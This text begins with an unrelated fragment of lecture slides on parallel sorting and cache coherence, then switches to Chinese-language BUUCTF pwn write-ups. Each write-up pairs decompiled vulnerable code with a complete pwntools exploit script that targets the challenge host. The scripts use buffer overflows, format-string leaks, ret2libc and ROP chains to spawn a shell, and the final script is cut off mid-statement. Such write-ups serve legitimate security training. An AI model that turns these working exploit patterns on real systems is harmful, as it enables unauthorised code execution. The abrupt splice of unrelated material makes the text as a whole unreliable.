  - Parallel Sorting by Regular Sampling (H. Shi & J. Schaeffer, J. Parallel & Distributed Computing, 1992)

Parallelizing Partitioning Step

Experience with Parallel Partitioning

Could not obtain speedup
Speculate: Too much data copying
- Could not do everything within source array
- Set up temporary space for reassembling partition

Lessons Learned

Must have parallelization strategy
- Partition into k independent parts
- Divide-and-conquer
Inner loops must be synchronization free
- Synchronization operations very expensive
Beware of Amdahl's Law
- Serial code can become bottleneck

Memory Consistency

What are the possible values printed ?
- Depends on memory consistency model
- Abstract model of how hardware handles concurrent accesses
Sequential consistency
- Overall effect consistent with each individual thread
- Otherwise, arbitrary interleaving

Sequential Consistency Example

Impossible outputs
- 100, 1 and 1, 100
- Would require reaching both Ra and Rb before Wa and Wb

Non-Coherent Cache Scenario

Write-back caches, without coordination between them

Snoopy Caches

Tag each cache block with state
- Invalid - Cannot use value
- Shared - Readable copy
- Exclusive - Writeable copy

When cache sees request for one of its E-tagged blocks
- Supply value from cache
- Set tag to S

References

Write-ups: BUUCTF

Sat, 05 Jul 2025 00:00:00 GMT

rip

Information

Category: Pwn
Points: 1

Write-up

丢给 IDA 老婆分析，看到有一个危险函数 gets，还有一个 fun 会返回 system("/bin/sh")，保护全关。直接打，注意栈对齐。

Exploit

#!/usr/bin/python

from pwn import ROP, args, context, flat, gdb, process, remote

gdbscript = """
b *main+32
b *main+67
c
"""

FILE = "./pwn1"
HOST, PORT = "node5.buuoj.cn", 27889

context(log_level="debug", binary=FILE, terminal="kitty")


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)

    if args.D:
        gdb.attach(target, gdbscript=gdbscript)

    return target


def construct_payload():
    elf = context.binary
    rop = ROP(elf)

    payload = flat(b"A" * 0x17, rop.ret.address, elf.symbols["fun"])

    return payload


def main():
    target = launch()
    payload = construct_payload()

    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

warmup_csaw_2016

Information

Category: Pwn
Points: 1

Write-up

int sprintf(char* buffer, const char* format, ...); 函数将格式化后的数据写入缓冲区，返回值是写入的字符数，不包括末尾的空字符 \0。snprintf 加入了缓冲区大小检查以及自动截断，比 sprintf 更安全，虽然本题没考这个函数的安全性问题。

这里 vuln 的地址将被写入 buffer s，然后 write 负责将 buffer s 中前九个字节，也就是 vuln 的地址输出到标准输出。

main 返回的是 gets，我们通过这个 gets 覆盖返回地址，修改为白送的 vuln 的地址即可。

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char s[64]; // [rsp+0h] [rbp-80h] BYREF
  _BYTE v5[64]; // [rsp+40h] [rbp-40h] BYREF

  write(1, "-Warm Up-\n", 0xAuLL);
  write(1, "WOW:", 4uLL);
  sprintf(s, "%p\n", vuln);
  write(1, s, 9uLL);
  write(1, ">", 1uLL);
  return gets(v5);
}

int vuln()
{
  return system("cat flag.txt");
}

Exploit

#!/usr/bin/python

from pwn import args, context, flat, gdb, process, remote

gdbscript = """
b *main+70
b *main+129
c
"""

FILE = "./pwn-patched"
HOST, PORT = "node5.buuoj.cn", 26553

context(log_level="debug", binary=FILE, terminal="kitty")


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)

    if args.D:
        gdb.attach(target, gdbscript=gdbscript)

    return target


def construct_payload(leaked_addr):
    payload = flat(b"A" * 0x48, leaked_addr)

    return payload


def main():
    target = launch()

    target.recvuntil(b"WOW:")
    leaked_addr = int(target.recvline().strip(), 16)

    payload = construct_payload(leaked_addr)

    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

ciscn_2019_n_1

Information

Category: Pwn
Points: 1

Write-up

通过 gets 将 v2 篡改为 11.28125 即可。

int func()
{
  _BYTE v1[44]; // [rsp+0h] [rbp-30h] BYREF
  float v2; // [rsp+2Ch] [rbp-4h]

  v2 = 0.0;
  puts("Let's guess the number.");
  gets(v1);
  if ( v2 == 11.28125 )
    return system("cat /flag");
  else
    return puts("Its value should be 11.28125");
}

第一次接触小数的处理问题，调试的时候，可以使用 p/f $xmm0 来查看这个寄存器的值，同理，使用 p 指令加上强制转换和解引用，可以检查地址处保存的小数值：

pwndbg> p/f $xmm0
$1 = {
  v8_bfloat16 = {-0, 11.25, 0, 0, 0, 0, 0, 0},
  v8_half = {-0, 2.6016, 0, 0, 0, 0, 0, 0},
  v4_float = {11.28125, 0, 0, 0},
  v2_double = {5.404878958234834e-315, 0},
  v16_int8 = {0, -128, 52, 65, 0 <repeats 12 times>},
  v8_int16 = {-0, 2.6016, 0, 0, 0, 0, 0, 0},
  v4_int32 = {11.28125, 0, 0, 0},
  v2_int64 = {5.404878958234834e-315, 0},
  uint128 = 3.98770131343430171379e-4942
}
pwndbg> p/f $xmm0.v4_int32[0]
$2 = 11.28125
pwndbg> p *(float *)($rbp - 4)
$3 = 11.28125

Exploit

#!/usr/bin/python

from pwn import args, context, flat, gdb, process, remote, struct

gdbscript = """
b *func+58
c
"""

FILE = "./ciscn_2019_n_1"
HOST, PORT = "node5.buuoj.cn", 25637

context(log_level="debug", binary=FILE, terminal="kitty")


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)

    if args.D:
        gdb.attach(target, gdbscript=gdbscript)

    return target


def construct_payload():
    payload = flat(b"A" * 0x2C, struct.pack("<f", 11.28125))

    return payload


def main():
    target = launch()

    payload = construct_payload()

    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

pwn1_sctf_2016

Information

Category: Pwn
Points: 1

Write-up

int vuln()
{
  const char *v0; // eax
  int v2; // [esp+8h] [ebp-50h]
  char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
  _BYTE v4[4]; // [esp+3Ch] [ebp-1Ch] BYREF
  _BYTE v5[7]; // [esp+40h] [ebp-18h] BYREF
  char v6; // [esp+47h] [ebp-11h] BYREF
  _BYTE v7[7]; // [esp+48h] [ebp-10h] BYREF
  _BYTE v8[5]; // [esp+4Fh] [ebp-9h] BYREF

  printf("Tell me something about yourself: ");
  fgets(s, 32, edata);
  std::string::operator=(&input, s);
  std::allocator<char>::allocator(&v6);
  std::string::string(v5, "you", &v6);
  std::allocator<char>::allocator(v8);
  std::string::string(v7, "I", v8);
  replace((std::string *)v4, (std::string *)&input, (std::string *)v7);
  std::string::operator=(&input, v4, v2, v5);
  std::string::~string(v4);
  std::string::~string(v7);
  std::allocator<char>::~allocator(v8);
  std::string::~string(v5);
  std::allocator<char>::~allocator(&v6);
  v0 = (const char *)std::string::c_str((std::string *)&input);
  strcpy(s, v0);
  return printf("So, %s\n", s);
}

从上面代码可知，fegts 读取了 32 个字符到 buffer s，其中 \0 占了一个位置，所以我们可以输入的有 31 个字符。

接着，replace 会将 buffer s 中的字符 I 替换为 you，返回修改后的字符串，赋给 input；v0 是 input.c_str() 的结果，其中 c_str() 的功能是 Returns a pointer to a null-terminated character array with data equivalent to those stored in the string. 这个结果被 strcpy 复制到 buffer s，由于 strcpy 不会检查 buffer 大小，所以可能造成溢出，溢出后我们篡改返回地址返回到后门函数 get_flag 即可。

这个 replace 函数怎么说呢……反正我是没自己读反编译的代码，没学过 C++，看着头好大……我做这题的时候刚开始是看见 vuln 中有涉及 replace 的字眼，就觉得可能会对字符串做一些替换修改的操作吧。接着看到代码中出现的 you，I 这样的字符串常量，直接运行程序拿这些内容去试试，发现输入 I 会被替换成 you，那 replace 的作用不用看也猜得差不多了。最后，闲的没事，我让 GPT 分析了一下 replace 的功能，和猜的也差不多。太菜了呜呜呜……

std::string *__stdcall replace(std::string *a1, std::string *a2, std::string *a3)
{
  int v4; // [esp+Ch] [ebp-4Ch]
  _BYTE v5[4]; // [esp+10h] [ebp-48h] BYREF
  _BYTE v6[7]; // [esp+14h] [ebp-44h] BYREF
  char v7; // [esp+1Bh] [ebp-3Dh] BYREF
  int v8; // [esp+1Ch] [ebp-3Ch]
  _BYTE v9[4]; // [esp+20h] [ebp-38h] BYREF
  int v10; // [esp+24h] [ebp-34h] BYREF
  int v11; // [esp+28h] [ebp-30h] BYREF
  char v12; // [esp+2Fh] [ebp-29h] BYREF
  _DWORD v13[2]; // [esp+30h] [ebp-28h] BYREF
  _BYTE v14[4]; // [esp+38h] [ebp-20h] BYREF
  int v15; // [esp+3Ch] [ebp-1Ch]
  _BYTE v16[4]; // [esp+40h] [ebp-18h] BYREF
  int v17; // [esp+44h] [ebp-14h] BYREF
  _BYTE v18[4]; // [esp+48h] [ebp-10h] BYREF
  _BYTE v19[8]; // [esp+4Ch] [ebp-Ch] BYREF

  while ( std::string::find(a2, a3, 0) != -1 )
  {
    std::allocator<char>::allocator(&v7);
    v8 = std::string::find(a2, a3, 0);
    std::string::begin((std::string *)v9);
    __gnu_cxx::__normal_iterator<char *,std::string>::operator+(&v10);
    std::string::begin((std::string *)&v11);
    std::string::string<__gnu_cxx::__normal_iterator<char *,std::string>>(v6, v11, v10, &v7);
    std::allocator<char>::~allocator(&v7);
    std::allocator<char>::allocator(&v12);
    std::string::end((std::string *)v13);
    v13[1] = std::string::length(a3);
    v15 = std::string::find(a2, a3, 0);
    std::string::begin((std::string *)v16);
    __gnu_cxx::__normal_iterator<char *,std::string>::operator+(v14);
    __gnu_cxx::__normal_iterator<char *,std::string>::operator+(&v17);
    std::string::string<__gnu_cxx::__normal_iterator<char *,std::string>>(v5, v17, v13[0], &v12);
    std::allocator<char>::~allocator(&v12);
    std::operator+<char>((std::string *)v19);
    std::operator+<char>((std::string *)v18);
    std::string::operator=(a2, v18, v5, v4);
    std::string::~string(v18);
    std::string::~string(v19);
    std::string::~string(v5);
    std::string::~string(v6);
  }
  std::string::string(a1, a2);
  return a1;
}

Exploit

#!/usr/bin/python

from pwn import args, context, flat, gdb, process, remote

gdbscript = """
b *vuln+42
c
"""

FILE = "./pwn1_sctf_2016"
HOST, PORT = "node5.buuoj.cn", 28688

context(log_level="debug", binary=FILE, terminal="kitty")


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)

    if args.D:
        gdb.attach(target, gdbscript=gdbscript)

    return target


def construct_payload():
    elf = context.binary

    payload = flat(b"I" * 21 + b"A", elf.symbols["get_flag"])

    return payload


def main():
    target = launch()

    payload = construct_payload()

    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

jarvisoj_level0

Information

Category: Pwn
Points: 1

Write-up

闹着玩呢？不写了，和第一题差不多。

Exploit

#!/usr/bin/python

from pwn import ROP, args, context, flat, gdb, process, remote

gdbscript = """
c
"""

FILE = "./level0"
HOST, PORT = "node5.buuoj.cn", 27572

context(log_level="debug", binary=FILE, terminal="kitty")


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)

    if args.D:
        gdb.attach(target, gdbscript=gdbscript)

    return target


def construct_payload():
    elf = context.binary
    rop = ROP(elf)

    payload = flat(b"A" * 0x88, rop.ret.address, elf.symbols["callsystem"])

    return payload


def main():
    target = launch()

    payload = construct_payload()

    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

[第五空间 2019 决赛] PWN5

Information

Category: Pwn
Points: 1

Write-up

int __cdecl main(int a1)
{
  time_t v1; // eax
  int result; // eax
  int fd; // [esp+0h] [ebp-84h]
  char nptr[16]; // [esp+4h] [ebp-80h] BYREF
  char buf[100]; // [esp+14h] [ebp-70h] BYREF
  unsigned int v6; // [esp+78h] [ebp-Ch]
  int *v7; // [esp+7Ch] [ebp-8h]

  v7 = &a1;
  v6 = __readgsdword(0x14u);
  setvbuf(stdout, 0, 2, 0);
  v1 = time(0);
  srand(v1);
  fd = open("/dev/urandom", 0);
  read(fd, &dword_804C044, 4u);
  printf("your name:");
  read(0, buf, 0x63u);
  printf("Hello,");
  printf(buf);
  printf("your passwd:");
  read(0, nptr, 0xFu);
  if ( atoi(nptr) == dword_804C044 )
  {
    puts("ok!!");
    system("/bin/sh");
  }
  else
  {
    puts("fail");
  }
  result = 0;
  if ( __readgsdword(0x14u) != v6 )
    sub_80493D0();
  return result;
}

核心逻辑是判断 atoi(nptr) == dword_804C044，因此只要我们需要知道 dword_804C044 的值，就可以拿到 shell。

这题完全就是考了个格式化字符串漏洞，read(fd, &dword_804C044, 4u); 将随机数读取到 bss 段，所以我们只要想办法泄漏 bss 中保存的 dword_804C044 的值就好了。dword_804C044 的地址可以通过 bss 段基地址加上 debug 出来的数据偏移计算得到。把泄漏的地址和格式化字符串一起作为输入发送，用 %s 来输出栈上保存的地址所指向的值。

Exploit

#!/usr/bin/python

from pwn import args, context, flat, gdb, process, remote, u32

gdbscript = """
b *0x80492bc
b *0x80492f0
c
"""

FILE = "./pwn"
HOST, PORT = "node5.buuoj.cn", 26163

context(log_level="debug", binary=FILE, terminal="kitty")


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)

    if args.D:
        gdb.attach(target, gdbscript=gdbscript)

    return target


def rev_atoi(data):
    return str(u32(data)).encode()


def construct_payload():
    elf = context.binary

    payload = flat(b"aa%12$s\x00", elf.bss() + 0x4)

    return payload


def main():
    target = launch()

    payload = construct_payload()

    target.sendlineafter(b"your name:", payload)
    target.recvuntil(b"aa")

    passwd = rev_atoi(target.recv(0x4))

    target.sendlineafter(b"your passwd:", passwd)
    target.interactive()


if __name__ == "__main__":
    main()

jarvisoj_level2

Information

Category: Pwn
Points: 1

Write-up

ssize_t vulnerable_function()
{
  _BYTE buf[136]; // [esp+0h] [ebp-88h] BYREF

  system("echo Input:");
  return read(0, buf, 256u);
}

观察上面程序，read 可以溢出破坏返回地址。由于这是 32-bit 程序，函数参数通过栈来传递，所以我们可以覆盖返回地址为 system@plt，然后在栈上写传给 system 的参数。

我们希望拿 shell，直接 IDA Shift + F12 看程序包含的字符串，发现有 .data:0804A024 hint db '/bin/sh',0，那么参数问题就解决了，因为没开 PIE，直接就是固定地址。

需要注意的是，如果你返回到 call system@plt 这样的内部指令，由于 call 指令会自动将下一条指令的地址压入栈中，作为函数调用结束后的返回地址，所以你可以直接在它之后写要传入的参数；而如果选择返回到 system@plt，那就需要手动提供一个地址作为函数调用结束后的返回地址，之后才是跟着函数的参数。

即，call 指令可以分解为 push eip_next; jmp <entry>，而返回到 system@plt 相当于直接 jmp system@plt，没有设置返回地址。

Exploit

#!/usr/bin/python

from pwn import args, context, flat, gdb, process, remote

gdbscript = """
set follow-fork-mode parent
b *vulnerable_function+42
b *vulnerable_function+52
c
"""

FILE = "./level2"
HOST, PORT = "node5.buuoj.cn", 25976

context(log_level="debug", binary=FILE, terminal="kitty")


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)

    if args.D:
        gdb.attach(target, gdbscript=gdbscript)

    return target


def construct_payload():
    elf = context.binary

    payload = flat(
        b"A" * 0x8C,
        elf.plt["system"],
        0x0,  # return address placeholder
        next(elf.search(b"/bin/sh")),
    )

    return payload


def main():
    target = launch()

    payload = construct_payload()

    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

ciscn_2019_n_8

Information

Category: Pwn
Points: 1

Write-up

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp-14h] [ebp-20h]
  int v5; // [esp-10h] [ebp-1Ch]

  var[13] = 0;
  var[14] = 0;
  init();
  puts("What's your name?");
  __isoc99_scanf("%s", var, v4, v5);
  if ( *(_QWORD *)&var[13] )
  {
    if ( *(_QWORD *)&var[13] == 17LL )
      system("/bin/sh");
    else
      printf(
        "something wrong! val is %d",
        var[0],
        var[1],
        var[2],
        var[3],
        var[4],
        var[5],
        var[6],
        var[7],
        var[8],
        var[9],
        var[10],
        var[11],
        var[12],
        var[13],
        var[14]);
  }
  else
  {
    printf("%s, Welcome!\n", var);
    puts("Try do something~");
  }
  return 0;
}

__isoc99_scanf((int)"%s", (int)var, v4, v5); 存在栈溢出漏洞，因为没有限制 %s 可以读取的字符数。这里 IDA 反编译出来多了两个无关的参数 v4 和 v5，直接忽视就好了。后面两个条件判断，第一个 *(_QWORD *)&var[13] 是将 &var[13] 处的八字节，解释成一个整数，看它的值是否为 0，不为零则进入下一个判断；*(_QWORD *)&var[13] == 0x11LL，看 &var[13] 这个地址处的八字节整数是否为 0x11，成立则 getshell。

Exploit

#!/usr/bin/python

from pwn import args, context, flat, gdb, p64, process, remote

gdbscript = """
b *main+100
b *main+105
c
"""

FILE = "./ciscn_2019_n_8"
HOST, PORT = "node5.buuoj.cn", 29741

context(log_level="debug", binary=FILE, terminal="kitty")


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)

    if args.D:
        gdb.attach(target, gdbscript=gdbscript)

    return target


def construct_payload():
    payload = flat(b"A" * 52, p64(0x11))

    return payload


def main():
    target = launch()

    payload = construct_payload()

    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

bjdctf_2020_babystack

Information

Category: Pwn
Points: 1

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  _BYTE buf[12]; // [rsp+0h] [rbp-10h] BYREF
  size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF

  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  LODWORD(nbytes) = 0;
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("* And Welcome to the bin world!  *");
  puts("*  Let's try to pwn the world!   *");
  puts("* Please told me u answer loudly!*");
  puts("[+]Are u ready?");
  puts("[+]Please input the length of your name:");
  __isoc99_scanf("%d", &nbytes);
  puts("[+]What's u name?");
  read(0, buf, (unsigned int)nbytes);
  return 0;
}

read 读取多少字符是通过 __isoc99_scanf 控制的。

Exploit

#!/usr/bin/python

from pwn import ROP, args, context, flat, gdb, process, remote

gdbscript = """
b *main+197
b *main+208
c
"""

FILE = "./bjdctf_2020_babystack"
HOST, PORT = "node5.buuoj.cn", 29741

context(log_level="debug", binary=FILE, terminal="kitty")


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)

    if args.D:
        gdb.attach(target, gdbscript=gdbscript)

    return target


def construct_payload():
    elf = context.binary
    rop = ROP(elf)

    payload = flat(b"A" * 0x18, rop.ret.address, elf.symbols["backdoor"])

    return payload


def main():
    target = launch()

    payload = construct_payload()

    target.sendlineafter(b"your name:", b"1337")
    target.sendlineafter(b"What's u name?", payload)
    target.interactive()


if __name__ == "__main__":
    main()

ciscn_2019_c_1

Information

Category: Pwn
Points: 1

Write-up

程序的 main 函数里没什么有用的信息，重点看下面的 encrypt 函数。

int encrypt()
{
  size_t v0; // rbx
  char s[48]; // [rsp+0h] [rbp-50h] BYREF
  __int16 v3; // [rsp+30h] [rbp-20h]

  memset(s, 0, sizeof(s));
  v3 = 0;
  puts("Input your Plaintext to be encrypted");
  gets(s);
  while ( 1 )
  {
    v0 = (unsigned int)x;
    if ( v0 >= strlen(s) )
      break;
    if ( s[x] <= 96 || s[x] > 122 )
    {
      if ( s[x] <= 64 || s[x] > 90 )
      {
        if ( s[x] > 47 && s[x] <= 57 )
          s[x] ^= 0xFu;
      }
      else
      {
        s[x] ^= 0xEu;
      }
    }
    else
    {
      s[x] ^= 0xDu;
    }
    ++x;
  }
  puts("Ciphertext");
  return puts(s);
}

基本就是把输入字符串经过一些 xor 运算，得到密文。注意到获取输入使用的是 gets，所以我们可以覆盖返回地址。程序没有包含任何后门函数，所以我们可以打 shellcode 或者 ROP，但是程序开了 NX，而且 ropper 也没有给出什么 syscall 之类的构造 ROP 链的 gadgets，那就打 ret2plt 泄漏 libc 地址，再打 ret2libc getshell.

不过我们的 payload 经过 encrypt 的加密会被破坏，所以一个想法是想办法让我们的输入经过 encrypt 的加密出来得到的是 payload 本身，另一种想法是想办法绕过加密逻辑。前者比较麻烦，我们优先思考后者。发现执行加密逻辑前有个判断，如果满足 if ( v0 >= strlen(s) ) 就不会执行加密逻辑。字符串长度是通过 strlen 获取的，这个函数判断字符串结束的方法是检测 \x00 字符，所以如果我们把 \x00 放在 payload 开头，这个判断就会认为我们的字符串长度为 0，不去执行下面的加密逻辑，成功绕过。

因为 encrypt 是返回到 puts(s)，由于在此之前我们已经执行过 puts 了，所以 got 表中一定有它在 libc 中的真实地址。所以我们可以通过 puts 泄漏 puts@got 中保存的真实地址，然后算出 libc 基地址，再用 libc 中的 system 和 /bin/sh 字符串构造 getshell 的 ROP 链。

由于我们返回到 puts 泄漏完地址后程序就结束了，所以我们在第一阶段泄漏出地址后需要让程序返回到 main，重新运行主菜单逻辑（只要程序没有 exit，就不会改变 libc 基址），之后再把第二阶段的 ROP 链发出去。

由于题目没给 libc，所以远程需要用 LibcSearcher 来打。本地打的时候直接用系统的 libc，等本地通了再改成 LibcSearcher 去打远端，直接用 LibcSearcher 打不通本地，可能因为 libc-database 更新不及时，没有我们本地的 libc 版本。

Exploit

#!/usr/bin/python

from pwn import ROP, args, context, flat, gdb, log, process, remote, u64

from LibcSearcher.LibcSearcher import LibcSearcher

gdbscript = """
# b *encrypt+61
# b *encrypt+322
# b *encrypt+334
c
"""

FILE = "./ciscn_2019_c_1"
HOST, PORT = "node5.buuoj.cn", 28304

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)

    if args.D:
        gdb.attach(target, gdbscript=gdbscript)

    return target


def construct_payload(stage, libc, libc_base):
    rop = ROP(elf)

    if stage == 1:
        return flat(
            b"\x00",
            b"A" * 0x57,
            rop.rdi.address,
            elf.got["puts"],
            elf.plt["puts"],
            elf.symbols["main"],
        )
    elif stage == 2:
        return flat(
            b"\x00",
            b"A" * 0x57,
            rop.rdi.address,
            libc_base + libc.dump("str_bin_sh"),
            rop.ret.address,
            libc_base + libc.dump("system"),
            0x0,
        )
    else:
        log.error(b"Failed constructing payload!")


def main():
    target = launch()

    payload = construct_payload(1, None, None)

    target.sendlineafter(b"Input your choice!", b"1")
    target.sendline(payload)
    target.recvuntil(b"Ciphertext")

    leaked_puts = u64(target.recv(0x8).strip().ljust(8, b"\x00"))
    libc = LibcSearcher("puts", leaked_puts)
    libc_base = leaked_puts - libc.dump("puts")

    log.success(f"libc base: {hex(libc_base)}")

    payload = construct_payload(2, libc, libc_base)

    target.sendlineafter(b"Input your choice!", b"1")
    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

jarvisoj_level2_x64

Information

Category: Pwn
Points: 1

Write-up

vulnerable_function 有一个 BOF，我们用它覆盖 retaddr 构造 ROP Chain，由于会返回到 system("echo 'Hello World!'")，我们只要想办法改掉 rdi 即可。这里没有发现获得栈地址的方法，把 /bin/sh 写入栈上不行。但是 IDA 搜索字符串发现程序本身包含 /bin/sh 字符串，没 PIE，直接拿来用。

Exploit

#!/usr/bin/env python3

from pwn import ROP, args, context, flat, p64, process, raw_input, remote

FILE = "./level2_x64"
HOST, PORT = "node5.buuoj.cn", 27792

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    rop = ROP(elf)
    payload = flat(
        b"A" * 0x88,
        p64(rop.rdi.address),
        0x600A90,
        p64(rop.ret.address),
        elf.plt["system"],
    )

    raw_input()
    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

get_started_3dsctf_2016

Information

Category: Pwn
Points: 1

Write-up

main 中 gets BOF，覆盖返回地址为 get_flag 即可。但是这个函数会检测传入的两个参数，我们需要把参数设置好。

本地打通了，打远程的时候遇到 timeout: the monitored command dumped core，有几种说法是：栈没对齐；程序没正常退出。这里我们给 get_flag 设置返回到 exit 就行。

Exploit

#!/usr/bin/env python3

from pwn import args, context, flat, p32, process, raw_input, remote

FILE = "./get_started_3dsctf_2016"
HOST, PORT = "node5.buuoj.cn", 25782

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    payload = flat(
        b"A" * 0x38,
        elf.sym["get_flag"],
        p32(0x0804E6A0),
        p32(814536271),
        p32(425138641),
    )

    # raw_input()
    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

[HarekazeCTF2019]baby_rop

Information

Category: Pwn
Points: 1

Write-up

和前面 jarvisoj_level2_x64 差不多。

Exploit

#!/usr/bin/env python3

from pwn import ROP, args, context, flat, process, raw_input, remote

FILE = "./babyrop"
HOST, PORT = "node5.buuoj.cn", 28698

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    rop = ROP(elf)
    payload = flat(
        b"A" * 0x18,
        rop.rdi.address,
        next(elf.search(b"/bin/sh")),
        rop.ret.address,
        elf.plt["system"],
    )

    # raw_input()
    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

others_shellcode

Information

Category: Pwn
Points: 1

Write-up

怕不是签到题？

Exploit

#!/usr/bin/env python3

from pwn import args, context, process, remote

FILE = "./shell_asm"
HOST, PORT = "node5.buuoj.cn", 28960

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    # raw_input()
    target.interactive()


if __name__ == "__main__":
    main()

[OGeek2019]babyrop

Information

Category: Pwn
Points: 1

Write-up

strlen 检测到 \x00 就结束，所以先通过 \x00 绕过 strncmp。之后将 buf[7] 处的一字节有符号整数转换为无符号数返回，如果这里是 -1 就会返回很大的数。

int __cdecl sub_804871F(int buffer)
{
  size_t len; // eax
  char s[32]; // [esp+Ch] [ebp-4Ch] BYREF
  char buf[32]; // [esp+2Ch] [ebp-2Ch] BYREF
  ssize_t v5; // [esp+4Ch] [ebp-Ch]

  memset(s, 0, sizeof(s));
  memset(buf, 0, sizeof(buf));
  sprintf(s, "%ld", buffer);
  v5 = read(0, buf, 32u);
  buf[v5 - 1] = 0;
  len = strlen(buf);
  if ( strncmp(buf, s, len) )
    exit(0);
  write(1, "Correct\n", 8u);
  return (unsigned __int8)buf[7];
}

sub_80487D0 将上一个函数的返回值作为参数，如果等于 127 就执行第一个 read，否则执行第二个 read。由于我们在 buf[7] 处保存 -1，会返回 0xffffffff，所以我们获得了一个很大的 BOF 空间。

ssize_t __cdecl sub_80487D0(char a1)
{
  _BYTE buf[231]; // [esp+11h] [ebp-E7h] BYREF

  if ( a1 == 127 )
    return read(0, buf, 200u);
  else
    return read(0, buf, a1);
}

思路是绕过 sub_804871F 的 strncmp 后，拿到一个很大的栈溢出，通过 sub_80487D0 的 read(0, buf, a1) 构造 ROP，利用 puts 泄漏 libc，puts 返回到 main 触发二次输入，同理先绕检测，然后构造 getshell 的 ROP Chain.

Exploit

#!/usr/bin/env python3

from pwn import ELF, args, context, flat, p32, process, remote, u32

FILE = "./challenge"
HOST, PORT = "node5.buuoj.cn", 26812

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = ELF("./libc-2.23.so")


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    payload_1 = b"\x00" * 0x7 + b"\xff" + b"\x00"
    target.send(payload_1)
    target.recvuntil(b"\x0a")
    payload = flat(b"A" * 0xEB, elf.plt["puts"], p32(elf.sym["main"]), elf.got["puts"])
    target.send(payload)
    libc.address = u32(target.recv(0x4)) - libc.sym["puts"]

    target.send(payload_1)
    target.recvuntil(b"\x0a")
    payload = flat(b"A" * 0xEB, libc.sym["system"], 0, next(libc.search(b"/bin/sh")))
    target.send(payload)
    target.interactive()


if __name__ == "__main__":
    main()

ciscn_2019_n_5

Information

Category: Pwn
Points: 1

Write-up

一个保护都没开，本来想打 ret2shellcode，但是奈何没给 libc，啥也不是！

无奈，只得使用好久没用过的 LibcSearcher 了 lol

Exploit

#!/usr/bin/env python3

from pwn import (
    ROP,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
    u64,
)

from LibcSearcher.LibcSearcher import LibcSearcher

FILE = "./ciscn_2019_n_5"
HOST, PORT = "node5.buuoj.cn", 26903

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
rop = ROP(elf)


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    # raw_input("DEBUG")

    target.sendlineafter(b"name", b"")
    payload = flat(
        b"A" * 0x28,
        rop.rdi.address,
        elf.got["puts"],
        elf.plt["puts"],
        elf.sym["main"],
    )
    target.sendlineafter(b"me?", payload)

    target.recvline()
    leaked_puts = u64(target.recv(0x6).strip().ljust(0x8, b"\x00"))
    libc = LibcSearcher("puts", leaked_puts)
    libc_base = leaked_puts - libc.dump("puts")

    payload = flat(
        b"A" * 0x28,
        rop.rdi.address,
        libc_base + libc.dump("str_bin_sh"),
        rop.ret.address,
        libc_base + libc.dump("system"),
        libc_base + libc.dump("exit"),
    )
    target.sendlineafter(b"name", b"")
    target.sendlineafter(b"me?", payload)

    target.interactive()


if __name__ == "__main__":
    main()

not_the_same_3dsctf_2016

Information

Category: Pwn
Points: 1

Write-up

BOF，ROP Chain，有后门函数 get_secret，会将 flag 写入 bss，我们通过 write 输出 bss 内容即可。

Exploit

#!/usr/bin/env python3

from pwn import (
    ROP,
    args,
    constants,
    context,
    flat,
    process,
    raw_input,
    remote,
)

FILE = "./not_the_same_3dsctf_2016"
HOST, PORT = "node5.buuoj.cn", 25163

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
rop = ROP(elf)


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    # raw_input("DEBUG")
    payload = flat(
